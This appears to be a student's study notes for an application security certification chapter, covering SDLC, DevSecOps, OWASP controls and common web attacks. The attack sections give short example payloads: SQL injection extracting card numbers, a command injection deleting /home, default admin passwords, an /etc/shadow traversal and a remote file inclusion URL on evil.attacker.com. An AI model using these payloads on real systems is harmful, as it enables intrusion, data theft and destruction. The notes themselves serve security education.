<h1 style='text-align:center'>Chapter 6: Application Security</h1>

Security practitioners should undestand the `SDLC` and its security implications to ensure software is well written and secure throughout its lifespan.

---

# Software Assurance Best Practices

Including security concerns should be done at every stage of the SDLC.

## The Software Development Life Cycle

The `software development life cycle (SDLC)` describes the steps taken in the development of software over its lifetime. SDLC is useful because it provides a consistent framework to structure workflow and provide planning for the process.

## Software Development Phases

1. `Planning` - deciding on whether effort for development should occur and whether there are alternative solutions. Results in a recommendation with a plan to move forward.
2. `Requirements Definition` - if feasible, customer input is needed to determine functionality, what current systems do and don't do, and improvments that are desired. Possibly includes `security requirements definition`.
3. `Design` - design for functionality, architecture, integration points and techniques, dataflows, business processes, etc.
4. `Coding` - coding, testing, and `unit testing` (testing of small components individually to ensure correct functionality).
5. `Testing` - formal testing with customers. Includes integrating components and testing functionality. `User acceptance testing (UAT)` occurs to ensure the users of the software are satisfied.
6. `Trainingn and Transition` - end users are trained. Also called the `acceptance, installation, and deployment` phase.
7. `Operations and Maintenance` - after completion, the project enters the phase for patching, updating, minor modifications, and other work. Usually the longest phase.
8. `Decommissioning` - end of life cycle. Important as it can produce cost savings by shutting down old projects.

Order of theses phases can vary.

### Code Deployment Environments

Multiple environments are usually used.

- `Development Enviornment` - used for developers. May be individual or shared environemnt. This is where the work is initially done.
- `Test Environment` - used for testing without impacting production. `Quality Assurance` takes place here.
- `Staging Environment` - a transition environment for code that has successfully cleared testing and is waiting to be deployed.
- `Production Enviornment` - the live system.

Change management processes are used to move through these enviornments.

## DevSecOps and DevOps

`DevOps` combines software development and IT with the goal of optimizing the SDLC. Done by using a collection of tools to improve the process. Tools include those that help with coding, building, packaging, releasing, and configuring monitoring software.

`DevSecOps` describes security as part of the DevOps model. In this model, security is part of the entire process and is implement throughout the SDLC. Security people here includes the role of threat analysis and communications, planning, tewsting, providing feedback, and ongoing improvements.

### Continuous Integration and Continuous Deployment

`Continuous Integration (CI)` is a development practice that continuosly checks code in a shared repository. The goal is to use automation and scripting to implement automated courses of action that result in continuous delivery of code. Often paired with `continuous deployment (CD)`, which rolls out tested changes in production automatically as soon as they have been tested. This requires `continuous validation` and `continuous monitoring` to ensure vulnerabilities are not introduced.

---

# Designing and Coding for Security

Security can be built in to the SDLC process from the beginning to help ensure more secure software.

## Secure Coding Practices

`OWASP (Open Worldwide Application Security Project)` is one of the best resources for secure coding practices. OWASP top proactive controls include:

- `Define Security Requirements`
- `Leverage Security Frameworks and Libraries`
- `Secure Database Access` - prebuilt SQL queries to prevent injection.
- `Encode and Escape Data` - Remove special characters.
- `Validate all Inputs` - Treat user input as untrusted and filter.
- `Implement Digital Identity` - Use multifactor authentication, secure password storage and recovery, and session handling.
- `Enforce Access Controls` - Require all requests to go through access control checks, deny by default, and apply principle of least privilege.
- `Protect Data Everywhere` - use encryption always.
- `Implement Security Logging and Monitoring` - helps detect problems.
- `Handle All Errors and Exceptions` - errors should not provide sensitive data and applications should be tested.

## API Security

`Application Programming Interfaces (APIs)` are interfaces between clients and servers or applications and operating systems that define how the client should ask for information and how the server will respond. Programs written in any language can implement the API and make requests.

APIs can be a vulnerability and should be secured via:

- Authentication
- Authorization
- Proper data scoping
- Rate limiting
- Input filtering
- Monitoring and logging

---

# Software Security Testing

There will always be some type of flaw in code.There are numerous tools and testing methods today to help address this issue.

## Analyzing and Testing Code

`Static code analysis` is conducted by reviewing the code for an application. This is a known-environment style test, since it has access to the source code. The program is not run in these tests. The analysis focuses on understanding how the program is written and what it is intended to do. Can be done with automated tools or through manual review.

`Dynamic code analysis` relies on executing code with provided inputs. Can be done with automated tools or manually (automated is prefered due to the volume of tests it can handle).

`Fuzzing` or `Fuzz testing` involves sending random or invalid data to an application to test how it handles it. It monitors the application for crashes, fails, or whether it responds incorrectly. Fuzzing is typically automated. However, it does not always detect complex problems.

---

# Injection Vulnerabilities

`Injection Vulnerabilities` are a primary attack method. It allows an attacker to supply code to the web application as input to trick the server into either executing that code or supplying it to another server to execute.

## SQL Injection Attacks

User input is often used to query a database. A simple search query might be:

```sql
SELECT ItemName, ItemDescription, ItemPrice
FROM Products
WHERE ItemName LIKE '%orange%' AND
ItemName LIKE '%tiger%' AND
ItemName LIKE '%pillow%'
```

An `SQL injection (SQLi)` attack may send unusual requests instead:

```sql
orange tiger pillow'; SELECT CustomerName, CreditCardNumber FROM Orders; --
```

The server may respond with the following:

```sql
SELECT ItemName, ItemDescription, ItemPrice
FROM Products
WHERE ItemName LIKE '%orange%' AND
ItemName LIKE '%tiger%' AND
ItemName LIKE '%pillow';
SELECT CustomerName, CreditCardNumber
FROM Orders;
--%'
```

If this is allowed through, the server may run two different SQL queries. The second query (after the `;`) would retrieve customer names and credit card numbers.

While many web applications do not necessarly show the attacker the SQL response, an attacker can use `blind SQL injection` to conduct an attack even when they can't see the results directly. There are two types of blind SQL injection attacks:

1. `Content-based blind SQL injection attack` - the attacker sends input to the web application to test whether the application is interpreting injected code. For example, the following would return all record input files because `1=1` always will return true:

```sql
SELECT FirstName, LastName, Balance
FROM Accounts
WHERE AccountNumber = '52019' OR 1=1
```

The web application may be built to show only the first response, and regardless of whether all records are returned, only the first may be shown. An attacker can then test the application by sending a false query (`52019' AND 1=2;--`). If the application then provides a return page with no results, it can be reasonably sure that the application is vulnerable to blind SQL injection. From here, more malicious queries can be used.

2. `Blind Timing-Based SQL Injection` focus on using the amount of time required to process a query as a channel for retrieving information from a database. Attacks depend on delay mechanisms via the database platforms. Microsoft SQL Server's Transact-SQL allows commands such as:

```sql
WAITFOR DELAY `00:00:15`
```

This instructs the DB to wait 15 seconds before performing the next action. If results are not immediately returned, the attack can infer that the application is vulnerable to time-based attacks.

Pseudo code to show how this attack might work:

```
For each character in the password
   For each letter in the alphabet
    If the current character is equal to the current letter, wait 15
     seconds before returning results
```

## Code Injection Attacks

`Code Injection` attacks seek to insert attacker-written code into the legitimate code created by a developer (of which SQL Injection attacks are specific examples of). Any environment that allows this is vulnerable. Examples include `LDAP injection`, `XML injection`, or via linked libraries (`DLL injection attacks`). `Cross-site scripting` is also an example of code injection that inserts HTML code.

## Command Injection Attacks

`Command Injection Attacks` are those that reach back to the operating system. For example, on a user creation application that uses Linux, the following command would result in a system command that deletes the /home folder:

```bash
input -> mjarvis & rm -rf /home
// results in
system('mkdir /home/students/mjarvis & rm -rf home')
```

# Exploiting Authentication Vulnerabilities

This aims at undermining authentication systems to gain access to systems, services, or protected information.

## Password Authentication

Passwords are a knowledge-based authentication technique. This leads to an attacker impersonating a user if they get their password. Passwords can be discovered via `social engineering` to trick users into revealing their passwords, through `eavesdropping or unencrypted network traffic`, or getting a `password dump` leading to `brute-force attacks`. `Default admin accounts` can be another issue is passwords are not changed. Useful username/password combinations to test include:

- administrator/password
- admin/password
- admin/admin

## Session Attacks

`Session Hijacking` attacks attempt to steal an existing authenticated session. They use a already authenticated session to do what they need to. User sessions are usually managed using `cookies` (in the user's browser and transmitted as part of the `HTTP header`). These cookies may be used to authenticate future requests. The cookie is a storage object that holds variables used by the browser and can be accessed by the website that created them. The website maintains this data in the user's browser. The cookie contains a authentication string that ties the cookie to a particular user session.

If an attacker can steal someone's cookie, they may impersonate that user on the website that issued the cookie. Stealing a cookie can occur through several means:

- Eavesdropping on an unencrypted network and stealing a copy of the cookie as it is transmitted.
- Installing malware on the user's browser and transmitting it to themselves.
- Engaging in an `on-path attack`, where the attacker tricks the user into thinking they are the target website - presenting a fake authentication form. They then authenticate to the website on the user's behalf.

Once they have the cookie, the attacker may use the cookie as the badge required to access the site (known as a `session replay attack`).

Web developers can protect against cookie theft by marking cookies with the `SECURE` attribute. `Secure cookies` are never transmitted over unencrypted HTTP connections.

The `pass-the-hash attack` is another form of replay attack that takes place against the operating system. After gaining access to a Windows system, they harvest stored NTLM password hashes from that system. They can use the hashes to attempt to gain admin access.

### Unvalidated Redirects

Insecure URL redirects are another vulnerability that attackers may exploit in an attempt to steal user sessions. If an application allows redirection to any URL, this creates a situation known as an `unvalidated redirect`, which an attacker may use to redirect a user to a malicious site. To prevent this, developers should perform `validated redirects` that check redirection URLs against an approved list.

# Exploiting Authorization Vulnerabilities

`Insecure direct object reference` is a situtation that occurs if there is a lack of authorization checks to ensure the user has access to information. This could be achieved by changing the numbers corresponding to files in a URL. For example:

```
www.company.com/getDocument.php?documentID=1801
```

`Directory traversal` attacks work when web servers allow the inclusion of operators that navigate directory paths and filesystem access controls don't properly restrict access to files stored elsewhere on the server. For example, accessing the shadow password file on a linux server via `www.companyx.com/../../../etc/shadow`.

`File inclusion` attacks actually execute the code contained within a file, allowing the attacker to fool the web server into executing arbitrary code. They come in two variants:

1. `Local file inclusion` seeks to execute code sotred in a file located elsewhere on the web server. They work similar to directory traversal attacks. For example, one might execute a file named `attack.exe` that is stored on the `C:\www.uploads` directory on the server via:

```
www.companyx.com/app.php?include=C:\\www\\uploads\\attack.exe
```

2. `Remote file inclusion` seeks to execute code that is stored on a remote server. These are more dangerous because the attacker can directly control what is being executed without first having to store the file on the local server. For example:

```
www.companyx.com/app.php?include=http://evil.attacker.com/attack.exe
```

File inclusion type attacks are usually used to upload a remote `web shell` to the server. Web shells allow attackers to execute commands on the server and view the results in the browser. This allows them access over HTTP and HTTPS ports making their traffic less likely to be detected.

`Privilege escalation` attacks seek to increase the level of access that an attacker has on a system, such as getting root account access.

# Exploiting Web Application Vulnerabilities

# Application Security Controls

# Secure Coding Practices

# Automation and Orchestration

# Summary

# Exam Notes

1. Know that static testing analyzes code without executing it. This approach points developers directly at vulnerabilities and often provides specific remediation suggestions. Dynamic testing executes code as part of the test, running all the interfaces that the code exposes to the user with a variety of inputs, searching for vulnerabilities.

2. In a SQL injection attack, malicious code is inserted into strings of code that are later passed to a SQL database server.

3. Remember that privilege escalation attacks focus on exploiting flaws to gain elevated permissions or access. A successful privilege escalation attack can allow a normal or an untrusted user to use administrator or other privileged access.

4.

````

```

```
````
